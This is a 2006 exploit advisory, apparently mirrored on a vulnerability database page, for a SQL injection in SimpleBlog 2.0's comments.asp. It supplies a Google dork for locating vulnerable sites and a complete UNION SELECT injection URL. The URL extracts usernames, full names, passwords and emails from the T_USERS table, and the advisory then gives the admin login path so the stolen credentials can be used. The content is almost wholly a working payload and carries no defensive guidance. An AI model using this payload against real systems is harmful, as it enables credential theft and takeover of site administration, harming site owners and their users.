Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14005
HistoryAug 23, 2006 - 12:00 a.m.

SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit

2006-08-2300:00:00
vulners.com
6

################################################################################

SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Credit by | Chironex Fleckeri

Mail | [email protected]

Googledork | Powered By SimpleBlog 2.0

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

################################################################################

####################################################################################################################################################
#http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
####################################################################################################################################################

###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################